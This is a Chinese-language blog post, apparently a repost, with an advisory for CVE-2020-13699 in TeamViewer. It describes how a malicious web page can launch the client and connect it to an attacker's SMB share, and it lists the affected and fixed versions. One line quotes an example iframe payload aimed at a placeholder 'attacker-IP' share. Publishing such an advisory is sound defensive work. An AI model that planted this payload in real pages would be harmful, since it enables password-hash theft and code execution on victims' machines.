CVE-2020-13699: TeamViewer 用户密码破解漏洞通告 - 程序员阿鑫-带你一起秃头!

CVE-2020-13699: TeamViewer 用户密码破解漏洞通告

作者: 程序员阿鑫

好兄弟,我们一起掉头发!

手机扫码查看

特别声明:文章多为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系!

攻击者通过让被攻击者点击精心构造的网页,以启动TeamViewer Windows桌面客户端并打开一个远程SMB共享,即可转发该请求(使用类似响应者)以执行代码(或捕获以进行哈希破解)。
近日,TeamViewer 官方发布了 TeamViewer 用户密码破解漏洞 的风险通告,漏洞概况如下:
一:CVE编号
CVE-2020-13699
风险等级高危
利用条件
访问攻击者精心构造的恶意页面
二:漏洞详情
TeamViewer是一款可以随时随地连接到远程桌面电脑、移动设备及Iot,让远程连接过程更加的快速和安全,轻松实现对文件、网络及程序的实时支持或访问的远程连接控制软件。
TeamViewer多个版本中存在 用户密码破解漏洞,攻击者通过让被攻击者点击精心构造的嵌入恶意iframe(iframe src="teamviewer10: --play \\attacker-IP\share\fake.tvs")的网页,以启动TeamViewer Windows桌面客户端并打开一个远程SMB共享,即可转发该请求(使用类似响应者)以执行代码(或捕获以进行哈希破解)。
三、影响范围
 
【影响版本】
TeamViewer < 8.0.258861
TeamViewer < 9.0.28860
TeamViewer < 10.0.258873
TeamViewer < 11.0.258870
TeamViewer < 12.0.258869
TeamViewer < 13.2.36220
TeamViewer < 14.2.56676
TeamViewer < 15.8.3
四、解决方案
 
打开TeamViewer -> 点击按钮帮助 -> 点击按钮关于TeamViewer -> 查看TeamViewer版本号。
以确保TeamViewer的版本是非漏洞版本。
针对此漏洞官方已在8.0.258861、9.0.258860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350和15.8.3版本中修复。
请受影响的用户参考以下链接安装补丁更新:https://www.teamviewer.com/en/download/previous-versions/

以上是《CVE-2020-13699: TeamViewer 用户密码破解漏洞通告》的全部内容

感谢您对程序员阿鑫博客的支持!

本文最后更新于2020-8-13,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
分享到:
打赏
未经允许不得转载:

作者: 程序员阿鑫, 转载或复制请以 超链接形式 并注明出处 程序员阿鑫-带你一起秃头!
原文地址: 《CVE-2020-13699: TeamViewer 用户密码破解漏洞通告》 发布于2020-8-13

评论

切换注册

登录

忘记密码?

您也可以使用第三方帐号快捷登录

切换登录

注册

CVE-2020-13699: TeamViewer 用户密码破解漏洞通告

长按图片转发给朋友

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏